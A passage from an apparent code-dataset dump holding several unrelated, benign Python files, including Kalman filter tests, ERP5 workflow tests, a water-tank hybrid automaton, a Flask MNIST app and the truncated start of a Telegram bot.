out[\"shock_sd\"] = np.array([1.2, 0.3, 0.2])\n\n out[\"transition_matrix\"] = np.array([[0.2, 1, 2], [0.5, 0.9, 0.7], [0.2, 0.4, 0.4]])\n\n return out\n\n\n@pytest.fixture\ndef expected_linear_predict():\n out = {}\n\n out[\"predicted_states\"] = np.array([[16.4, 13.7, 6.2], [14.6, 10.2, 4.8]])\n\n out[\"predicted_covs\"] = np.array(\n [\n [[5.552, 1.74, 0.932], [1.74, 1.011, 0.462], [0.932, 0.462, 0.276]],\n [[3.192, 0.5, 0.308], [0.5, 0.277, 0.104], [0.308, 0.104, 0.1]],\n ]\n )\n\n out[\"predicted_sqrt_covs\"] = np.array(\n [\n [\n [5.427423, -0.424064, 0.0809716],\n [-0.424064, 0.374016, -0.0487112],\n [0.0809716, -0.0487112, 0.0572607],\n ],\n [\n [3.11777, 0.273778, 0.0502302],\n [0.273778, 0.354309, 0.0453752],\n [0.0502302, 0.0453752, 0.05562],\n ],\n ]\n )\n\n return out\n\n\ndef test_sqrt_predict_states(setup_linear_predict, expected_linear_predict):\n d = setup_linear_predict\n calc_pred_state, calc_pred_cov = kf.sqrt_linear_predict(\n d[\"state\"], d[\"root_cov\"], d[\"shock_sd\"], d[\"transition_matrix\"]\n )\n aaae(calc_pred_state, expected_linear_predict[\"predicted_states\"])\n\n\ndef test_sqrt_predict_root_covs(setup_linear_predict, expected_linear_predict):\n d = setup_linear_predict\n calc_pred_state, calc_pred_root_cov = kf.sqrt_linear_predict(\n d[\"state\"], d[\"root_cov\"], d[\"shock_sd\"], d[\"transition_matrix\"]\n )\n calc_cov = np.matmul(\n calc_pred_root_cov, np.transpose(calc_pred_root_cov, axes=(0, 2, 1))\n )\n aaae(calc_cov, expected_linear_predict[\"predicted_sqrt_covs\"])\n\n\n@pytest.fixture\ndef setup_unscented_predict():\n out = {}\n\n nmixtures, nind, nsigma, nfac = 2, 3, 7, 3\n\n out[\"stage\"] = 1\n\n first = np.array([1.1, 1.2, 1.3])\n second = np.array([1.4, 1.5, 1.6])\n third = np.array([2.1, 2.2, 2.3])\n fourth = np.array([2.4, 2.5, 2.6])\n\n # these are sigma_points for the test with focus on columns\n sps1 = np.zeros((nmixtures, nind, nsigma, nfac))\n sps1[0, 0, :, :] = np.tile(first, nsigma).reshape(nsigma, nfac)\n sps1[0, 1, :, :] = np.tile(second, nsigma).reshape(nsigma, nfac)\n sps1[1, 0, :, :] = np.tile(third, nsigma).reshape(nsigma, nfac)\n sps1[1, 1, :, :] = np.tile(fourth, nsigma).reshape(nsigma, nfac)\n out[\"sps1\"] = sps1.reshape(nmixtures * nind, nsigma, nfac)\n out[\"flat_sps1\"] = sps1.reshape(nmixtures * nind * nsigma, nfac)\n\n expected_states1 = np.zeros((nmixtures, nind, nfac))\n expected_states1[0, 0, :] = first\n expected_states1[0, 1, :] = second\n expected_states1[1, 0, :] = third\n expected_states1[1, 1, :] = fourth\n out[\"expected_states1\"] = expected_states1.reshape(nmixtures * nind, nfac)\n\n # these are sigma_points for the test with focus on weighting\n sps2 = np.zeros((nmixtures, nind, nsigma, nfac))\n sps2[:, :, :, :] = np.arange(nsigma).repeat(nfac).reshape(nsigma, nfac)\n out[\"sps2\"] = sps2.reshape(nmixtures * nind, nsigma, nfac)\n out[\"flat_sps2\"] = sps2.reshape(nmixtures * nind * nsigma, nfac)\n out[\"expected_states2\"] = np.ones((nmixtures * nind, nfac)) * 3\n\n # these are sigma_points for the test with focus on the covariances\n sps3 = np.zeros((nmixtures, nind, nsigma, nfac))\n sps3[:, :, 1, :] += 1\n sps3[:, :, 2, :] += 2\n sps3[:, :, 3, :] += 3\n sps3[:, :, 4, :] -= 1\n sps3[:, :, 5, :] -= 2\n sps3[:, :, 6, :] -= 3\n out[\"sps3\"] = sps3.reshape(nmixtures * nind, nsigma, nfac)\n out[\"flat_sps3\"] = sps3.reshape(nmixtures * nind * nsigma, nfac)\n\n sws_m = np.ones(nsigma) / nsigma\n out[\"sws_m\"] = sws_m\n out[\"sws_c\"] = sws_m\n\n qq = np.eye(nfac)\n q = np.zeros((2, nfac, nfac))\n q[:] = qq\n out[\"q\"] = q\n\n out[\"transform_sps_args\"] = {}\n\n exp_covs = np.zeros((nmixtures * nind, nfac, nfac))\n exp_covs[:] = np.array([[4.75, 4.5, 4.5], [4.5, 4.75, 4.5], [4.5, 4.5, 4.75]])\n out[\"exp_covs\"] = exp_covs\n\n exp_cholcovs = np.zeros_like(exp_covs)\n exp_cholcovs[:] = np.array(\n [\n [2.23606798, 0.00000000, 0.00000000],\n [1.78885438, 1.34164079, 0.00000000],\n [1.78885438, 0.596284794, 1.20185043],\n ]\n ).T\n out[\"exp_cholcovs\"] = exp_cholcovs\n\n out[\"out_states\"] = np.zeros((nmixtures * nind, nfac))\n out_sqrt_covs = np.zeros((nmixtures * nind, nfac + 1, nfac + 1))\n out[\"out_sqrt_covs\"] = out_sqrt_covs\n out[\"out_covs\"] = out_sqrt_covs[:, 1:, 1:]\n\n return out\n\n\ndef test_sqrt_unscented_predict_focus_on_colums(setup_unscented_predict, mocker):\n d = setup_unscented_predict\n mock_transform = mocker.patch(\n \"skillmodels.fast_routines.kalman_filters.transform_sigma_points\"\n )\n mock_transform.return_value = d[\"sps1\"]\n kf.sqrt_unscented_predict(\n d[\"stage\"],\n d[\"sps1\"],\n d[\"flat_sps1\"],\n d[\"sws_m\"],\n d[\"sws_c\"],\n d[\"q\"],\n d[\"transform_sps_args\"],\n d[\"out_states\"],\n d[\"out_sqrt_covs\"],\n )\n\n aaae(d[\"out_states\"], d[\"expected_states1\"])\n\n\ndef test_sqrt_unscented_predict_focus_on_weighting(setup_unscented_predict, mocker):\n d = setup_unscented_predict\n mock_transform = mocker.patch(\n \"skillmodels.fast_routines.kalman_filters.transform_sigma_points\"\n )\n mock_transform.return_value = d[\"sps2\"]\n\n kf.sqrt_unscented_predict(\n d[\"stage\"],\n d[\"sps2\"],\n d[\"flat_sps2\"],\n d[\"sws_m\"],\n d[\"sws_c\"],\n d[\"q\"],\n d[\"transform_sps_args\"],\n d[\"out_states\"],\n d[\"out_sqrt_covs\"],\n )\n\n aaae(d[\"out_states\"], d[\"expected_states2\"])\n\n\ndef test_sqrt_unscented_predict_focus_on_covs(setup_unscented_predict, mocker):\n d = setup_unscented_predict\n mock_transform = mocker.patch(\n \"skillmodels.fast_routines.kalman_filters.transform_sigma_points\"\n )\n mock_transform.return_value = d[\"sps3\"]\n kf.sqrt_unscented_predict(\n d[\"stage\"],\n d[\"sps3\"],\n d[\"flat_sps3\"],\n d[\"sws_m\"],\n d[\"sws_c\"],\n d[\"q\"],\n d[\"transform_sps_args\"],\n d[\"out_states\"],\n d[\"out_sqrt_covs\"],\n )\n make_unique(d[\"out_covs\"])\n aaae(d[\"out_covs\"], d[\"exp_cholcovs\"])\n\n\nshock_sd = np.array(\n [\n [[1.2, 0.3, 0.2]],\n [[0.1, 0.9, 0.2]],\n [[0.3, 0.01, 0.3]],\n [[0.2, 0.5, 0.6]],\n [[0.7, 0.1, 0.4]],\n [[0.2, 0.1, 0.1]],\n ]\n)\n\n# ======================================================================================\n# tests from filterpy\n# ======================================================================================\n\n\ndef unpack_predict_fixture(fixture):\n nfac = len(fixture[\"state\"])\n\n args = (\n np.array(fixture[\"state\"]).reshape(1, nfac),\n np.array(fixture[\"state_cov\"]).reshape(1, nfac, nfac),\n np.array(fixture[\"shock_sd\"]),\n np.array(fixture[\"transition_matrix\"]),\n )\n exp_state = np.array(fixture[\"expected_post_means\"])\n exp_cov = np.array(fixture[\"expected_post_state_cov\"])\n return args, exp_state, exp_cov\n\n\ndef convert_normal_to_sqrt_args(args):\n args_list = list(args)\n covs = args[1]\n all_diagonal = True\n for i in range(len(covs)):\n if (np.diag(np.diagonal(covs[i])) != covs[i]).any():\n all_diagonal = False\n\n if all_diagonal is True:\n args_list[1] = np.sqrt(covs)\n else:\n args_list[1] = np.transpose(np.linalg.cholesky(covs), axes=(0, 2, 1))\n return tuple(args_list)\n\n\n# for the normal linear predict\n# ------------------------------\n\nfix_path = \"skillmodels/tests/fast_routines/generated_fixtures_predict.json\"\nwith open(fix_path, \"r\") as f:\n id_to_fix = json.load(f)\nids, fixtures = zip(*id_to_fix.items())\n\n\n@pytest.mark.parametrize(\"fixture\", fixtures, ids=ids)\ndef test_sqrt_linear_predicted_state_against_filterpy(fixture):\n args, exp_state, exp_cov = unpack_predict_fixture(fixture)\n args = convert_normal_to_sqrt_args(args)\n after_state, after_covs = kf.sqrt_linear_predict(*args)\n aaae(after_state.flatten(), exp_state)\n\n\nnp.set_printoptions(formatter={\"float\": \"{: 0.3f}\".format})\n\n\n@pytest.mark.parametrize(\"fixture\", fixtures, ids=ids)\ndef test_sqrt_linear_predicted_cov_against_filterpy(fixture):\n # this gives the covariance matrix, not a square root of it!\n args, exp_state, exp_cov = unpack_predict_fixture(fixture)\n args = convert_normal_to_sqrt_args(args)\n after_state, after_cov_sqrt = kf.sqrt_linear_predict(*args)\n after_cov_sqrt = after_cov_sqrt[0]\n\n implied_cov = after_cov_sqrt.T.dot(after_cov_sqrt)\n\n aaae(implied_cov, exp_cov)\n","sub_path":"skillmodels/tests/fast_routines/kalman_predict_test.py","file_name":"kalman_predict_test.py","file_ext":"py","file_size_in_byte":9777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"108433026","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n演示函数相关\n\"\"\"\nval = '张三'\nprint('%s个思恋,年终奖%s元' % ('牛牛', '10万'))\n\n\n# 定义函数\ndef calAge(age):\n if age >= 18:\n print(\"成年人\")\n else:\n print(\"未成年人\")\n\n\n# 调用函数\ncalAge(20)\n\n# 演示 list\nL = [\"马波\", \"牛波\", \"羊波\", \"皮波\", \"水波\"]\nresult = L[1:5]\nprint(result)\n","sub_path":"src/base/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"124545869","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2010 Nexedi SA and Contributors. All Rights Reserved.\n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsibility of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs\n# End users who are looking for a ready-to-use solution with commercial\n# guarantees and support are strongly advised to contract a Free Software\n# Service Company\n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n##############################################################################\n\nimport unittest\nfrom DateTime import DateTime\nfrom VifibSecurityMixin import testVifibSecurityMixin\nfrom Products.ERP5Type.tests.Sequence import SequenceList\nfrom Products.ERP5Type.tests.backportUnittest import skip\n\nclass TestVifibFiberSubscription(testVifibSecurityMixin):\n \"\"\"Class for test global registration processus\"\"\"\n\n def createVifibDocumentList(self):\n \"\"\"Create vifib document\"\"\"\n \n #Add a valid vifib support\n self.logMessage(\"Create Support\")\n module = self.portal.getDefaultModule(\"Organisation\")\n organisation = module.newContent(portal_type=\"Organisation\",\n reference=\"vifib-support\")\n self.markManualCreation(organisation)\n organisation.validate()\n\n #Install website\n self.logMessage(\"Install Websites\")\n self.portal.portal_skins.vifib_web.WebSite_install()\n\n #Add Proxy Role\n workflow = self.portal.portal_workflow.document_conversion_interaction_workflow\n sc_wf = getattr(workflow,\"scripts\")\n python_script = sc_wf.get(\"updateContentMd5\")\n python_script.manage_proxy(roles=[\"Manager\"]) \n\n def modifyFiberRequestState(self,transition_name,sequence,fiber_request=None):\n \"\"\"\n Calls the workflow for the fiber request\n \"\"\" \n if fiber_request is None:\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n #Do the workflow action\n fiber_request.portal_workflow.doActionFor(fiber_request, transition_name) \n\n def stepSetFiberSkin(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Change current Skin\n \"\"\"\n request = self.app.REQUEST\n self.getPortal().portal_skins.changeSkin(\"Fiber\")\n request.set('portal_skin', \"Fiber\")\n\n def stepCallNewFiberRequestDialog(self, sequence=None, sequence_list=None, **kw):\n \"\"\"Check access to the new free fiber request dialog\"\"\"\n self.portal.WebSection_viewNewFreeFiberRequestDialog()\n\n def stepCreateFiberRequest(self, sequence=None, sequence_list=None, **kw):\n \"\"\"Create a free fiber request\"\"\"\n\n #Create new request\n self.portal.WebSection_newFreeFiberRequest(\n dialog_id=\"WebSection_viewNewFreeFiberRequestDialog\",\n first_name=\"Test\", \n last_name=\"Vifib\", \n address_city=\"Cloud\", \n address_street_address=\"First\", \n address_zip_code=0000, \n default_birthplace_address_city=\"Nexedi\", \n default_email_text=\"test.toto@vifib.test\", \n internet_service_provider=\"Free\", \n start_date=DateTime(), \n telephone_text=\"0320707288\")\n \n def stepFindPendingFiberRequest(self, sequence=None, sequence_list=None, **kw):\n \"\"\"Find pending request in sequence like in the workflow list\"\"\"\n\n pending_request_list = self.portal.portal_catalog(\n validation_state=\"pending\",\n portal_type=\"Free Fiber Request\",\n title=\"Test Vifib\",\n sort_on=[('creation_date','descending')])\n\n #Set the last fiber request in the sequence\n self.assertTrue(len(pending_request_list) > 0)\n fiber_request = pending_request_list[0]\n sequence.edit(fiber_request_url=fiber_request.getRelativeUrl())\n\n def stepStartFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Start the fiber request present in sequence\"\"\"\n\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"start_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'started') \n\n def stepConfirmFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Confirm the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n fiber_request.setGender(\"mister\")\n self.modifyFiberRequestState(\"confirm_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'confirmed') \n\n def stepRefuseFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Refuse the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"refuse_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'refused') \n\n def stepRetractFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Retract the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"retract_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'retracted') \n\n def stepContactFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Contact the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"contact_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'contacted') \n\n def stepAcceptFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Accept the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"accept_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'accepted') \n\n @skip('Not maintained')\n def test_01_AnonymousCanCreateFiberRequest(self):\n \"\"\"Anonymous Fiber Request creation\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCallNewFiberRequestDialog \\\n stepCreateFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_02_ManagerFindPendingFiberRequest(self):\n \"\"\"Search request in pending list\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_03_StaffCanConfirmPendingRequest(self):\n \"\"\"Check confirmation of pending request\"\"\" \n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n\n @skip('Not maintained')\n def test_04_StaffCanRefusePendingRequest(self):\n \"\"\"Check we can refuse instead of confirm a request\"\"\" \n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepRefuseFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_05_StaffCanContactConfirmedRequest(self):\n \"\"\"Next the confirmation, we cantact the person\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n\n @skip('Not maintained')\n def test_06_StaffCanRetractConfirmedRequest(self):\n \"\"\"Instead of contact a person, we can retract the request\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepRetractFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_07_StaffCanAcceptContactedRequest(self):\n \"\"\"Contact was successfull, we accept the request\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n stepAcceptFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_08_StaffCanRetractContactedRequest(self):\n \"\"\"Cantact was unsuccessfull, we retract the request\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n stepRetractFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_09_StaffCanRetractAcceptedRequest(self):\n \"\"\"After accept a request, we are able to retract us.\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n stepAcceptFiberRequest \\\n stepRetractFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n\nclass TestVifibFiberSecurityRules(testVifibSecurityMixin):\n \"\"\"Test if security rules are correctly set\"\"\"\n\n @skip('Test must be written')\n def test_01_AnonymousCanAccessPublishedWebPage(self):\n pass\n\ndef test_suite():\n \"\"\"Define tests may be run\"\"\"\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestVifibFiberSubscription))\n suite.addTest(unittest.makeSuite(TestVifibFiberSecurityRules))\n\n return suite\n","sub_path":"master/product/Vifib/tests/testVifibFiber.py","file_name":"testVifibFiber.py","file_ext":"py","file_size_in_byte":13442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"308956326","text":"# The water-tank example coded in Python\n\n\nimport macropy.activate\nfrom language import *\nfrom gen import *\nfrom sympy import *\nimport shac\n\n# This is the Raskin model of the waterTank example\n# K = 0.075 heating rate in t4, h = 150.\n\node1 = Ode(sympify(\"diff(x(t))-(0.075*(150-x(t)))\"), sympify(\"x(t)\"), 20, {})\node2 = Ode(sympify(\"diff(x(t))\"), sympify(\"x(t)\"), 100, {})\node3 = Ode(sympify(\"diff(x(t))+(0.075*x(t))\"), sympify(\"x(t)\"), 100, {})\node4 = Ode(sympify(\"diff(x(t))\"), sympify(\"x(t)\"), 20, {})\n\n# The locations of the hybrid automaton\nt1 = Loc(\"t1\", [ode1], [],\n {S(\"x(t)\"): [Guard(S(\"x>=20\")), Guard(S(\"x < 100\"))]})\nt2 = Loc(\"t2\", [ode2], [],\n {S(\"x(t)\"): [Guard(S(\"x>=100\")), Guard(S(\"x <= 100\"))]})\nt3 = Loc(\"t3\", [ode3], [],\n {S(\"x(t)\"): [Guard(S(\"x>20\")), Guard(S(\"x <= 100\"))]})\nt4 = Loc(\"t4\", [ode4], [],\n {S(\"x(t)\"): [Guard(S(\"x>=20\")), Guard(S(\"x <= 20\"))]})\n\n# The edges\ne1 = Edge('t1', 't2', {S(\"x(t)\"): [Guard(S(\"x>=100\")),\n Guard(S(\"x <= 100\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [])\ne2 = Edge('t2', 't3', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"OFF\")])\ne3 = Edge('t1', 't3', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"OFF\")])\ne4 = Edge('t3', 't1', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"ON\")])\ne5 = Edge('t3', 't4', {S(\"x(t)\"): [Guard(S(\"x>=20\")),\n Guard(S(\"x <= 20\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [])\ne6 = Edge('t4', 't1', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"ON\")])\n\nwatertank = Ha(\"watertank\", [t1, t2, t3, t4], t4,\n [e1, e2, e3, e4, e5, e6], [], [])\n\n# Compile\n# shac.compile(watertank)\n","sub_path":"examples/TSE2015/Piha/watertank&burnerSAturationExample/watertank.py","file_name":"watertank.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"457616498","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n ans = \"\"\n size1, size2 = len(a), len(b) # 假设a较短\n if size1 > size2:\n return self.addBinary(b, a)\n carry = 0\n for i in range(size1-1,-1,-1): # 处理ab中对应位置的元素\n ans = str((carry + int(a[i]) + int(b[size2 -size1 + i]))%2) + ans\n\n if carry + int(a[i]) + int(b[size2 -size1 + i]) >= 2:\n carry = 1\n else:\n carry = 0\n\n for j in range(size2 - size1 -1, -1 ,-1): # 处理较长字符串中的剩余元素\n ans = str((int(b[j]) + carry) %2) + ans\n if carry + int(b[j]) == 2:\n carry = 1\n else:\n carry = 0\n\n if carry == 1:\n ans = \"1\" + ans\n\n return ans\n\nprint(Solution().addBinary(\"100\",\"110010\"))\n\n","sub_path":"字符串/67. 二进制求和.py","file_name":"67. 二进制求和.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227964507","text":"import numpy as np\n\ndef sigmoid(x):\n s = 1/(1 + np.exp(-x))\n return s\n\ndef sigmoid_derivative(x):\n s = sigmoid(x)\n ds = s * (1 - s)\n return ds\n\nxv = np.array([1, 2, 3])\nprint(sigmoid_derivative(xv))","sub_path":"week2assignment1.2.py","file_name":"week2assignment1.2.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"408767647","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import render_template\n\nimport PIL\nimport base64\nimport numpy as np\nfrom PIL import Image\nfrom io import BytesIO\nfrom time import sleep\n\nimport tensorflow as tf\nimport tflearn\n\napp = Flask(__name__, static_url_path='/static')\n\n\ndef build_model():\n tf.reset_default_graph()\n net = tflearn.input_data([None, 784])\n\n net = tflearn.fully_connected(net, 300, activation='ReLU')\n net = tflearn.fully_connected(net, 100, activation='ReLU')\n\n net = tflearn.fully_connected(net, 10, activation='softmax')\n\n net = tflearn.regression(net, optimizer='sgd', learning_rate=0.05, loss='categorical_crossentropy')\n\n model = tflearn.DNN(net)\n return model\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef home():\n resp = None\n if request.method == 'POST':\n data = request.form['canvas']\n data = base64.b64decode(data.replace('data:image/png;base64,', ''))\n img = Image.open(BytesIO(data))\n img = fill_background(img)\n img = resize(img, 28)\n X = do_array(img)\n X = X.reshape(784)\n # import pdb; pdb.set_trace()\n try:\n sleep(1)\n model = build_model()\n sleep(1)\n model.load('../MNIST.tfl')\n y = model.predict([X])\n resp = get_answer(y)\n except:\n resp = None\n return render_template('teste.html', resposta=resp)\n\n\ndef resize(img, width):\n wpercent = (width / float(img.size[0]))\n hsize = int((float(img.size[1]) * float(wpercent)))\n img = img.resize((width, hsize), PIL.Image.ANTIALIAS)\n return img\n\n\ndef do_array(img):\n temp = img\n temp = temp.convert('1')\n A = np.array(temp)\n new_A = np.empty((A.shape[0], A.shape[1]), None)\n\n for i in range(len(A)):\n for j in range(len(A[i])):\n if A[i][j] == True:\n new_A[i][j] = 0\n else:\n new_A[i][j] = 1\n return new_A\n\n\ndef fill_background(image):\n image.convert(\"RGBA\")\n pixel_data = image.load()\n\n if image.mode == \"RGBA\":\n for y in range(image.size[1]):\n for x in range(image.size[0]):\n if pixel_data[x, y][3] < 255:\n pixel_data[x, y] = (255, 255, 255, 255)\n return image\n\n\ndef get_answer(y):\n best = max(y[0])\n return y[0].index(best)\n","sub_path":"MNIST/webapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"156588051","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\nimport io\nimport logging\nimport os\nimport random\nimport re\nimport requests\nfrom requests.exceptions import ConnectionError\nfrom requests.exceptions import ReadTimeout\nimport sys\nimport threading\nimport time\n\n# сторонние модули\nimport pyowm\nimport telebot\nimport wikipedia\n\n# модуль с настройками\nimport data\n# модуль с токенами\nimport tokens\n\nmy_bot = telebot.TeleBot(tokens.bot, threaded=False)\n\nglobal weather_bold\nweather_bold = False\n\nglobal kek_counter\nkek_counter = 0\nglobal kek_bang\nglobal kek_crunch\n\nif sys.version[0] == '2':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\n\ndef user_action_log(message, text):\n print(\"{0}\\nUser {1} {2}\\n\".format(time.strftime(data.time, time.gmtime()), message.from_user.id, text))\n\n\n# приветствуем нового юзера /task-ом\n@my_bot.message_handler(content_types=['new_chat_member'])\ndef welcomingTask(message):\n '''\n path = data.dir_location_task\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n while (not rand_img.startswith(\"1\")):\n rand_img = random.choice(all_imgs)\n rand_img = random.choice(all_imgs)\n your_img = open(path+rand_img, \"rb\")\n my_bot.send_message(message.chat.id, 'Добро пожаловать в чат мехмата.\\nДокажи нам, что ты достоин — реши такую задачку:')\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n print(\"{0}\\nWelcoming message with this task:\\n{1}\\n\".format(time.strftime(data.time, time.gmtime()), your_img.name))\n your_img.close()\n '''\n file = open(data.file_location_rules, 'r')\n my_bot.send_message(message.chat.id, file.read(), parse_mode=\"HTML\", disable_web_page_preview=True,\n reply_to_message_id=message.message_id)\n file.close()\n\n\n# команды /start, /help, /links, /wifi, /chats\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in (\n '/start', '/start@algebrach_bot', '/help', '/help@algebrach_bot', '/links', '/links@algebrach_bot', '/wifi',\n '/wifi@algebrach_bot', '/chats', '/chats@algebrach_bot', '/rules', '/rules@algebrach_bot'))\ndef myData(message):\n command = message.text.lower().split()[0]\n if command.startswith('/start'):\n file_name = data.file_location_start\n user_action_log(message, \"started using the bot\")\n elif command.startswith('/help'):\n file_name = data.file_location_help\n user_action_log(message, \"looked for help\")\n elif command.startswith('/links'):\n file_name = data.file_location_links\n user_action_log(message, \"requested Mechmath links\")\n elif command.startswith('/wifi'):\n file_name = data.file_location_wifi\n user_action_log(message, \"requested the 